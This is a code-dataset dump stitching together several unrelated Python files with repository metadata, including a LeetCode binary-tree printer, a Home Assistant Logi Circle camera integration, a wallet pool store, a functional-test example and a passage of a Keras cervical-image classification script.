Example 3:
Input:
1
/ \
2 5
/
3
/
4
Output:
[["", "", "", "", "", "", "", "1", "", "", "", "", "", "", ""]
["", "", "", "2", "", "", "", "", "", "", "", "5", "", "", ""]
["", "3", "", "", "", "", "", "", "", "", "", "", "", "", ""]
["4", "", "", "", "", "", "", "", "", "", "", "", "", "", ""]]
Note: The height of binary tree is in the range of [1, 10].
"""
# V0
# V1
# https://blog.csdn.net/fuxuemingzhu/article/details/79439026
# http://bookshadow.com/weblog/2017/08/06/leetcode-print-binary-tree/
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
self.height = self.findDepth(root)
self.width = (1 << self.height) - 1
self.dmap = [[""] * self.width for x in range(self.height)]
self.traverse(root, 1, self.width >> 1)
return self.dmap
def findDepth(self, root):
if not root: return 0
return 1 + max(self.findDepth(root.left), self.findDepth(root.right))
def traverse(self, root, depth, offset):
if not root: return
self.dmap[depth - 1][offset] = str(root.val)
gap = 1 + self.width >> depth + 1
self.traverse(root.left, depth + 1, offset - gap)
self.traverse(root.right, depth + 1, offset + gap)
# V1'
# https://www.jiuzhang.com/solution/print-binary-tree/#tag-highlight-lang-python
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
def get_height(node):
if not node:
return 0
return 1 + max(get_height(node.left), get_height(node.right))
def traverse(node, level, pos):
if not node:
return
left_padding, spacing = 2 ** (rows - level - 1) - 1, 2 ** (rows - level) - 1
index = left_padding + pos * (spacing + 1)
res[level][index] = str(node.val)
#traverse(node.left, level + 1, pos << 1)
#traverse(node.right, level + 1, (pos << 1) + 1)
traverse(node.left, level + 1, pos*2) # N << 1 == N*2
traverse(node.right, level + 1, (pos*2) + 1)
rows = get_height(root)
cols = 2 ** rows - 1
res = [['' for _ in range(cols)] for _ in range(rows)]
traverse(root, 0, 0)
return res
# V2
# Time: O(h * 2^h)
# Space: O(h * 2^h)
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
def getWidth(root):
if not root:
return 0
return 2 * max(getWidth(root.left), getWidth(root.right)) + 1
def getHeight(root):
if not root:
return 0
return max(getHeight(root.left), getHeight(root.right)) + 1
def preorderTraversal(root, level, left, right, result):
if not root:
return
mid = left + (right-left)/2
result[level][mid] = str(root.val)
preorderTraversal(root.left, level+1, left, mid-1, result)
preorderTraversal(root.right, level+1, mid+1, right, result)
h, w = getHeight(root), getWidth(root)
result = [[""] * w for _ in xrange(h)]
preorderTraversal(root, 0, 0, w-1, result)
return result
| 33.861111
| 699
| 0.543478
|
814475d04de916ded03eb4fd29102ec2ed5a8163
| 6,996
|
py
|
Python
|
homeassistant/components/logi_circle/camera.py
|
cwilhelm/home-assistant
|
12d97f0637196c7e19bc655fc82da1a5d2c4888c
|
[
"Apache-2.0"
] | 2
|
2017-10-26T19:43:55.000Z
|
2017-12-30T23:29:00.000Z
|
homeassistant/components/logi_circle/camera.py
|
rdbahm/home-assistant
|
c8048e1aff7063e0301a208783a9fc939d05a100
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/logi_circle/camera.py
|
rdbahm/home-assistant
|
c8048e1aff7063e0301a208783a9fc939d05a100
|
[
"Apache-2.0"
] | 1
|
2022-02-20T07:41:14.000Z
|
2022-02-20T07:41:14.000Z
|
"""Support to the Logi Circle cameras."""
import asyncio
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.camera import (
ATTR_ENTITY_ID, ATTR_FILENAME, CAMERA_SERVICE_SCHEMA, DOMAIN,
PLATFORM_SCHEMA, SUPPORT_ON_OFF, Camera)
from homeassistant.const import (
ATTR_ATTRIBUTION, ATTR_BATTERY_CHARGING, ATTR_BATTERY_LEVEL,
CONF_SCAN_INTERVAL, STATE_OFF, STATE_ON)
from homeassistant.helpers import config_validation as cv
from . import ATTRIBUTION, DOMAIN as LOGI_CIRCLE_DOMAIN
DEPENDENCIES = ['logi_circle']
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=60)
SERVICE_SET_CONFIG = 'logi_circle_set_config'
SERVICE_LIVESTREAM_SNAPSHOT = 'logi_circle_livestream_snapshot'
SERVICE_LIVESTREAM_RECORD = 'logi_circle_livestream_record'
DATA_KEY = 'camera.logi_circle'
BATTERY_SAVING_MODE_KEY = 'BATTERY_SAVING'
PRIVACY_MODE_KEY = 'PRIVACY_MODE'
LED_MODE_KEY = 'LED'
ATTR_MODE = 'mode'
ATTR_VALUE = 'value'
ATTR_DURATION = 'duration'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL, default=SCAN_INTERVAL):
cv.time_period,
})
LOGI_CIRCLE_SERVICE_SET_CONFIG = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_MODE): vol.In([BATTERY_SAVING_MODE_KEY, LED_MODE_KEY,
PRIVACY_MODE_KEY]),
vol.Required(ATTR_VALUE): cv.boolean
})
LOGI_CIRCLE_SERVICE_SNAPSHOT = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_FILENAME): cv.template
})
LOGI_CIRCLE_SERVICE_RECORD = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_FILENAME): cv.template,
vol.Required(ATTR_DURATION): cv.positive_int
})
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up a Logi Circle Camera."""
devices = hass.data[LOGI_CIRCLE_DOMAIN]
cameras = []
for device in devices:
cameras.append(LogiCam(device, config))
async_add_entities(cameras, True)
async def service_handler(service):
"""Dispatch service calls to target entities."""
params = {key: value for key, value in service.data.items()
if key != ATTR_ENTITY_ID}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_devices = [dev for dev in cameras
if dev.entity_id in entity_ids]
else:
target_devices = cameras
for target_device in target_devices:
if service.service == SERVICE_SET_CONFIG:
await target_device.set_config(**params)
if service.service == SERVICE_LIVESTREAM_SNAPSHOT:
await target_device.livestream_snapshot(**params)
if service.service == SERVICE_LIVESTREAM_RECORD:
await target_device.download_livestream(**params)
hass.services.async_register(
DOMAIN, SERVICE_SET_CONFIG, service_handler,
schema=LOGI_CIRCLE_SERVICE_SET_CONFIG)
hass.services.async_register(
DOMAIN, SERVICE_LIVESTREAM_SNAPSHOT, service_handler,
schema=LOGI_CIRCLE_SERVICE_SNAPSHOT)
hass.services.async_register(
DOMAIN, SERVICE_LIVESTREAM_RECORD, service_handler,
schema=LOGI_CIRCLE_SERVICE_RECORD)
class LogiCam(Camera):
"""An implementation of a Logi Circle camera."""
def __init__(self, camera, device_info):
"""Initialize Logi Circle camera."""
super().__init__()
self._camera = camera
self._name = self._camera.name
self._id = self._camera.mac_address
self._has_battery = self._camera.supports_feature('battery_level')
@property
def unique_id(self):
"""Return a unique ID."""
return self._id
@property
def name(self):
"""Return the name of this camera."""
return self._name
@property
def supported_features(self):
"""Logi Circle camera's support turning on and off ("soft" switch)."""
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
"""Return the state attributes."""
state = {
ATTR_ATTRIBUTION: ATTRIBUTION,
'battery_saving_mode': (
STATE_ON if self._camera.battery_saving else STATE_OFF),
'ip_address': self._camera.ip_address,
'microphone_gain': self._camera.microphone_gain
}
# Add battery attributes if camera is battery-powered
if self._has_battery:
state[ATTR_BATTERY_CHARGING] = self._camera.is_charging
state[ATTR_BATTERY_LEVEL] = self._camera.battery_level
return state
async def async_camera_image(self):
"""Return a still image from the camera."""
return await self._camera.get_snapshot_image()
async def async_turn_off(self):
"""Disable streaming mode for this camera."""
await self._camera.set_streaming_mode(False)
async def async_turn_on(self):
"""Enable streaming mode for this camera."""
await self._camera.set_streaming_mode(True)
@property
def should_poll(self):
"""Update the image periodically."""
return True
async def set_config(self, mode, value):
"""Set an configuration property for the target camera."""
if mode == LED_MODE_KEY:
await self._camera.set_led(value)
if mode == PRIVACY_MODE_KEY:
await self._camera.set_privacy_mode(value)
if mode == BATTERY_SAVING_MODE_KEY:
await self._camera.set_battery_saving_mode(value)
async def download_livestream(self, filename, duration):
"""Download a recording from the camera's livestream."""
# Render filename from template.
filename.hass = self.hass
stream_file = filename.async_render(
variables={ATTR_ENTITY_ID: self.entity_id})
# Respect configured path whitelist.
if not self.hass.config.is_allowed_path(stream_file):
_LOGGER.error(
"Can't write %s, no access to path!", stream_file)
return
asyncio.shield(self._camera.record_livestream(
stream_file, timedelta(seconds=duration)), loop=self.hass.loop)
async def livestream_snapshot(self, filename):
"""Download a still frame from the camera's livestream."""
# Render filename from template.
filename.hass = self.hass
snapshot_file = filename.async_render(
variables={ATTR_ENTITY_ID: self.entity_id})
# Respect configured path whitelist.
if not self.hass.config.is_allowed_path(snapshot_file):
_LOGGER.error(
"Can't write %s, no access to path!", snapshot_file)
return
asyncio.shield(self._camera.get_livestream_image(
snapshot_file), loop=self.hass.loop)
async def async_update(self):
"""Update camera entity and refresh attributes."""
await self._camera.update()
| 33.961165
| 78
| 0.679245
|
8195f4d1192c09c5df5f5d1a495fa62e82615fad
| 2,050
|
py
|
Python
|
rbig/_src/losses.py
|
IPL-UV/rb
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | 6
|
2020-10-14T08:35:29.000Z
|
2022-02-18T23:26:30.000Z
|
rbig/_src/losses.py
|
IPL-UV/rb
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | 11
|
2020-10-08T10:02:38.000Z
|
2021-03-26T16:00:41.000Z
|
rbig/_src/losses.py
|
IPL-UV/rbig
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | null | null | null |
from typing import Union
import numpy as np
from scipy.stats import norm, gaussian_kde
def negative_log_likelihood(X: np.ndarray, X_ldj: np.ndarray) -> np.ndarray:
pz = norm.logpdf(X).sum(axis=-1)
log_prob = pz + X_ldj
return -np.mean(log_prob)
def neg_entropy_normal(data, bins: Union[str, int] = "auto") -> np.ndarray:
"""Function to calculate the marginal negative entropy
(negative entropy per dimensions). It uses a histogram
scheme to initialize the bins and then uses a KDE
scheme to approximate a smooth solution.
Parameters
----------
data : array, (samples x dimensions)
Returns
-------
neg : array, (dimensions)
"""
n_samples, d_dimensions = data.shape
neg = np.zeros(d_dimensions)
# Loop through dimensions
for idim in range(d_dimensions):
# =====================
# Histogram Estimation
# =====================
# Get Histogram
[hist_counts, bin_edges] = np.histogram(
a=data[:, idim],
bins=bins,
range=(data[:, idim].min(), data[:, idim].max()),
)
# calculate bin centers
bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2
# get delta between bin centers
delta = bin_centers[3] - bin_centers[2]
# Calculate probabilities of normal distribution
pg = norm.pdf(bin_centers, 0, 1)
# ==================
# KDE Function Est.
# ==================
# Initialize KDE function with data
kde_model = gaussian_kde(data[:, idim])
# Calculate probabilities for each bin
hx = kde_model.pdf(bin_centers)
# Calculate probabilities
px = hx / (hx.sum() * delta)
# ====================
# Compare
# ====================
# Find the indices greater than zero
idx = np.where((px > 0) & (pg > 0))
# calculate the negative entropy
neg[idim] = delta * (px[idx] * np.log2(px[idx] / pg[idx])).sum()
return neg
| 25.949367
| 76
| 0.550244
|
a704cdb1063ef628366cc0a3b246068c32d37dc0
| 7,952
|
py
|
Python
|
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports if possible
from test_framework.mininode import CInv, NetworkThread, NodeConn, NodeConnCB, mininode_lock, MsgGetdata
from test_framework.test_framework import AvianTestFramework
from test_framework.util import assert_equal, connect_nodes, p2p_port
# NodeConnCB is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass NodeConnCB and
# override the on_*() methods if you need custom behaviour.
class BaseNode(NodeConnCB):
def __init__(self):
"""Initialize the NodeConnCB
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the NodeConnCB
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, conn, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_x16r()
self.block_receive_map[message.block.calc_x16r] += 1
def on_inv(self, conn, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the AvianTestFramework
pass
class ExampleTest(AvianTestFramework):
# Each functional test is a subclass of the AvianTestFramework class.
# Override the set_test_params(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
def setup_network(self):
"""Setup the test network topology
Often you won't need to override this, since the standard network topology
(linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
If you do override this method, remember to start the nodes, assign
them to self.nodes, connect them and then sync."""
self.setup_nodes()
# In this test, we're not connecting node2 to node0 or node1. Calls to
# sync_all() should not include node2, since we're not expecting it to
# sync.
connect_nodes(self.nodes[0], 1)
self.sync_all([self.nodes[0:1]])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
AvianTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
# Create a P2P connection to one of the nodes
node0 = BaseNode()
connections = [NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)]
node0.add_connection(connections[0])
# Start up network handling in another thread. This needs to be called
# after the P2P connections have been created.
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
# Generating a block on one of the nodes will get us out of IBD
blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
self.sync_all([self.nodes[0:1]])
# Notice above how we called an RPC by calling a method with the same
# name on the node object. Notice also how we used a keyword argument
# to specify a named RPC argument. Neither of those are defined on the
# node object. Instead there's some __getattr__() magic going on under
# the covers to dispatch unrecognised attribute calls to the RPC
# interface.
# Logs are nice. Do plenty of them. They can be used in place of comments for
# breaking the test into sub-sections.
self.log.info("Starting test!")
self.log.info("Calling a custom function")
custom_function()
self.log.info("Calling a custom method")
self.custom_method()
self.log.info("Create some blocks")
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
self.nodes[0].generate(10)
self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
self.nodes[1].waitforblockheight(11)
self.log.info("Connect node2 and node1")
connect_nodes(self.nodes[1], 2)
self.log.info("Add P2P connection to node2")
node2 = BaseNode()
connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
node2.add_connection(connections[1])
node2.wait_for_verack()
self.log.info("Wait for node2 reach current tip. Test that it has propagated all the blocks to us")
getdata_request = MsgGetdata()
for block in blocks:
getdata_request.inv.append(CInv(2, block))
node2.send_message(getdata_request)
self.sync_all([self.nodes[1:2]])
self.log.info("Check that each block was received only once")
# The network thread uses a global lock on data access to the NodeConn objects when sending and receiving
# messages. The test thread should acquire the global lock before accessing any NodeConn data to avoid locking
# and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
with mininode_lock:
for block in node2.block_receive_map.values():
assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
| 40.779487
| 118
| 0.68423
|
6a4951c6b9a861d5d20359dce35485c8945d6801
| 4,904
|
py
|
Python
|
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
import logging
from typing import List, Tuple, Dict, Optional
import aiosqlite
from melati.types.coin_solution import CoinSolution
from melati.util.db_wrapper import DBWrapper
from melati.util.ints import uint32
log = logging.getLogger(__name__)
class WalletPoolStore:
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
_state_transitions_cache: Dict[int, List[Tuple[uint32, CoinSolution]]]
@classmethod
async def create(cls, wrapper: DBWrapper):
self = cls()
self.db_connection = wrapper.db
self.db_wrapper = wrapper
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
"CREATE TABLE IF NOT EXISTS pool_state_transitions(transition_index integer, wallet_id integer, "
"height bigint, coin_spend blob, PRIMARY KEY(transition_index, wallet_id))"
)
await self.db_connection.commit()
await self.rebuild_cache()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM interested_coins")
await cursor.close()
await self.db_connection.commit()
async def add_spend(
self,
wallet_id: int,
spend: CoinSolution,
height: uint32,
) -> None:
"""
Appends (or replaces) entries in the DB. The new list must be at least as long as the existing list, and the
parent of the first spend must already be present in the DB. Note that this is not committed to the DB
until db_wrapper.commit() is called. However it is written to the cache, so it can be fetched with
get_all_state_transitions.
"""
if wallet_id not in self._state_transitions_cache:
self._state_transitions_cache[wallet_id] = []
all_state_transitions: List[Tuple[uint32, CoinSolution]] = self.get_spends_for_wallet(wallet_id)
if (height, spend) in all_state_transitions:
return
if len(all_state_transitions) > 0:
if height < all_state_transitions[-1][0]:
raise ValueError("Height cannot go down")
if spend.coin.parent_coin_info != all_state_transitions[-1][1].coin.name():
raise ValueError("New spend does not extend")
all_state_transitions.append((height, spend))
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO pool_state_transitions VALUES (?, ?, ?, ?)",
(
len(all_state_transitions) - 1,
wallet_id,
height,
bytes(spend),
),
)
await cursor.close()
def get_spends_for_wallet(self, wallet_id: int) -> List[Tuple[uint32, CoinSolution]]:
"""
Retrieves all entries for a wallet ID from the cache, works even if commit is not called yet.
"""
return self._state_transitions_cache.get(wallet_id, [])
async def rebuild_cache(self) -> None:
"""
This resets the cache, and loads all entries from the DB. Any entries in the cache that were not committed
are removed. This can happen if a state transition in wallet_blockchain fails.
"""
cursor = await self.db_connection.execute("SELECT * FROM pool_state_transitions ORDER BY transition_index")
rows = await cursor.fetchall()
await cursor.close()
self._state_transitions_cache = {}
for row in rows:
_, wallet_id, height, coin_solution_bytes = row
coin_solution: CoinSolution = CoinSolution.from_bytes(coin_solution_bytes)
if wallet_id not in self._state_transitions_cache:
self._state_transitions_cache[wallet_id] = []
self._state_transitions_cache[wallet_id].append((height, coin_solution))
async def rollback(self, height: int, wallet_id_arg: int) -> None:
"""
Rollback removes all entries which have entry_height > height passed in. Note that this is not committed to the
DB until db_wrapper.commit() is called. However it is written to the cache, so it can be fetched with
get_all_state_transitions.
"""
for wallet_id, items in self._state_transitions_cache.items():
remove_index_start: Optional[int] = None
for i, (item_block_height, _) in enumerate(items):
if item_block_height > height and wallet_id == wallet_id_arg:
remove_index_start = i
break
if remove_index_start is not None:
del items[remove_index_start:]
cursor = await self.db_connection.execute(
"DELETE FROM pool_state_transitions WHERE height>? AND wallet_id=?", (height, wallet_id_arg)
)
await cursor.close()
| 41.559322
| 119
| 0.653956
|
f431634900d76cde0def851323ef059366643e00
| 92
|
py
|
Python
|
Pattern/21_pattern.py
|
manish1822510059/Python-1000-program
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | 1
|
2021-03-06T03:33:42.000Z
|
2021-03-06T03:33:42.000Z
|
Pattern/21_pattern.py
|
manish1822510059/Python-1000-programs
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | null | null | null |
Pattern/21_pattern.py
|
manish1822510059/Python-1000-programs
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | null | null | null |
for i in range(1,6):
for j in range(5,i-1,-1):
print(i,end="")
print()
| 23
| 30
| 0.456522
|
563aeff287da7bfd1444ed33c2f0ac004a4803bb
| 16,581
|
py
|
Python
|
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | null | null | null |
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | null | null | null |
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | 2
|
2017-06-27T07:14:06.000Z
|
2021-07-20T15:21:58.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import cv2
import time
import shutil
import os
import math
from scipy import ndimage
import matplotlib.pyplot as plt
import skimage.io as skio
import skimage.transform as sktf
import skimage.morphology as skmorph
import skimage.exposure as skexp
import numpy as np
import keras
from keras.layers import Conv2D, UpSampling2D, \
Flatten, Activation, Reshape, MaxPooling2D, Input, Dense, merge, Dropout, SpatialDropout2D, BatchNormalization
from keras.models import Model
import keras.losses
import keras.callbacks as kall
import pandas as pd
from keras.preprocessing.image import ImageDataGenerator
from keras.utils.vis_utils import plot_model as kplot
from keras.utils import np_utils
from keras.utils.vis_utils import plot_model
#####################################################
def buildModelCNN_Classification(inpShape=(256, 256, 3),
numCls=3, kernelSize=3, numFlt = 16,
numConv=2, numSubsampling=5, ppadding='valid', numHidden=None):
fsiz = (kernelSize, kernelSize)
psiz = (2, 2)
dataInput = Input(shape=inpShape)
#
x = dataInput
# (1) Conv-layers
for cc in range(numSubsampling):
if cc==0:
tfsiz = (5,5)
else:
tfsiz = fsiz
for ii in range(numConv):
x = Conv2D(filters=numFlt * (2 **cc), kernel_size=tfsiz,
activation='relu',
padding=ppadding,
W_regularizer=keras.regularizers.l2(0.01))(x)
# x = BatchNormalization()(x)
# x = Activation('relu')(x)
x = MaxPooling2D(pool_size=psiz, padding=ppadding)(x)
# (2) flatening
x = Flatten()(x)
x = Dropout(rate=0.2)(x)
# (3) hidden dense-layers
if numHidden is not None:
if isinstance(numHidden, list):
for numUnits in numHidden:
x = Dense(units=numUnits, activation='relu', W_regularizer=keras.regularizers.l2(0.01))(x)
else:
x = Dense(units=numHidden, activation='relu',
# W_regularizer=keras.regularizers.l2(0.02)
)(x)
x = Dropout(rate=0.5)(x)
# (4) multiclass-output
x = Dense(units=numCls, activation='softmax')(x)
retModel = Model(inputs=dataInput, outputs=x)
return retModel
#####################################################
def preproc_image(pimg, prnd=None):
ndim = pimg.ndim
if prnd is None:
trnd = np.random.randint(2)
else:
trnd = prnd
timg = pimg[:, :, :3].copy()
ret = pimg.copy()
if trnd == 0:
timg = skexp.equalize_hist(timg.astype(np.uint8)).astype(np.float32) * 255.
elif trnd == 1:
vrnd = 1.0 + 0.2 * ( np.random.rand() - 0.5)
timg = skexp.adjust_gamma(timg, vrnd, 2.71828 / np.exp(vrnd))
elif trnd > 1:
rndVals = 2.0 * np.random.rand(ndim,2) - 1.0
rndVals[:, 0] *= 30
rndVals[:, 1] = 1.0 + 0.2 * rndVals[:, 1]
for ii in range(ndim):
timg[:,:,ii] = rndVals[ii,0] + rndVals[ii,1] * timg[:,:,ii]
timg[timg < 0] = 0
timg[timg > 255] = 255
ret[:, :,:3] = timg.copy()
return ret
#####################################################
def calcDistArr2Point(parr2d, pp2d):
sizArr = parr2d.shape[0]
ret = np.linalg.norm(parr2d - np.tile(pp2d, (sizArr,1)), axis=1)
return ret
def buildImageWithRotScaleAroundCenter(pimg, pcnt, pangDec, pscale, pcropSize, isDebug=False):
# (1) precalc parameters
angRad = (np.pi / 180.) * pangDec
cosa = np.cos(angRad)
sina = np.sin(angRad)
# (2) prepare separate affine transformation matrices
matShiftB = np.array([[1., 0., -pcnt[0]], [0., 1., -pcnt[1]], [0., 0., 1.]])
matRot = np.array([[cosa, sina, 0.], [-sina, cosa, 0.], [0., 0., 1.]])
matShiftF = np.array([[1., 0., +pcnt[0]], [0., 1., +pcnt[1]], [0., 0., 1.]])
matScale = np.array([[pscale, 0., 0.], [0., pscale, 0.], [0., 0., 1.]])
matShiftCrop = np.array([[1., 0., pcropSize[0] / 2.], [0., 1., pcropSize[1] / 2.], [0., 0., 1.]])
# matTotal_OCV = matShiftF.dot(matRot.dot(matScale.dot(matShiftB)))
# (3) build total-matrix
matTotal = matShiftCrop.dot(matRot.dot(matScale.dot(matShiftB)))
if isDebug:
print ('(1) mat-shift-backward = \n{0}'.format(matShiftB))
print ('(2) mat-scale = \n{0}'.format(matScale))
print ('(3) mat-rot = \n{0}'.format(matRot))
print ('(4) mat-shift-forward = \n{0}'.format(matShiftF))
print ('(5) mat-shift-crop = \n{0}'.format(matShiftCrop))
print ('---\n(*) mat-total = \n{0}'.format(matTotal))
# (4) warp image with total affine-transform
imgRet = cv2.warpAffine(pimg, matTotal[:2, :], pcropSize)
return imgRet
def prepareCervixAndChannelInfo(pimg, pRelChnSize = 0.4, isDebug = False):
# (1) prepare masks
tmsk = pimg[:, :, 3]
timg = pimg[:, :, :3]
tmsk_chn = (tmsk == 128)
tmsk_crv = (tmsk > 100)
# rc - mean first-idx -> row, second-idx -> column, xy - mean first-idx -> column, second-idx -> row :)
# (2) find channel cover-circle and center of this corcle
rc_pts_channel = np.array(np.where(tmsk_chn)).transpose()
(rc_channel_cnt, r_channel) = cv2.minEnclosingCircle(rc_pts_channel)
dist_chn2cnt = calcDistArr2Point(rc_pts_channel, rc_channel_cnt)
r_channel_good = rc_pts_channel[dist_chn2cnt < pRelChnSize * r_channel, :]
#FIXME: Fill holes before this step!!!
# (2) prepare cervix contour
contour_crv = tmsk_crv & (~skmorph.erosion(tmsk_crv, skmorph.disk(1)))
rc_crvContour = np.array(np.where(contour_crv)).transpose()
dist_contour2cnt = calcDistArr2Point(rc_crvContour, rc_channel_cnt)
r_cervix = np.min(dist_contour2cnt)
# rcCrvRminArg = np.argmin(rcRContour)
if r_cervix<r_channel:
r_cervix = r_channel
ret = {
'r_crv': r_cervix,
'r_chn': r_channel,
'r_chn_good': pRelChnSize * r_channel,
'cnt_chn': rc_channel_cnt,
'rc_chn': r_channel_good.copy()
}
if isDebug:
retSize = 256
newScale = float(retSize)/(2.*r_cervix + 2.)
xy_channel_cnt = rc_channel_cnt[::-1]
timg_crop = buildImageWithRotScaleAroundCenter(timg, xy_channel_cnt, 45., newScale, (retSize, retSize), isDebug=False)
#
plt.subplot(2, 2, 1)
plt.imshow(tmsk_chn)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.plot(r_channel_good[:, 1], r_channel_good[:, 0], 'y.')
plt.subplot(2, 2, 2)
plt.imshow(tmsk_crv)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.subplot(2, 2, 3)
plt.imshow(timg)
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_channel, edgecolor='r', fill=False))
plt.gcf().gca().add_artist(plt.Circle(rc_channel_cnt[::-1], r_cervix, edgecolor='g', fill=False))
plt.subplot(2, 2, 4)
plt.imshow(timg_crop)
plt.show()
return ret
def buildImgInfoList(dataImg):
numImg = dataImg.shape[0]
print (":: Prepare image info ({0})".format(dataImg.shape))
ret = []
for ii in range(numImg):
timg = dataImg[ii]
tinfo = prepareCervixAndChannelInfo(timg)
ret.append(tinfo)
if (ii%10)==0:
print ('[{0}/{1}]'.format(ii, numImg))
return ret
#####################################################
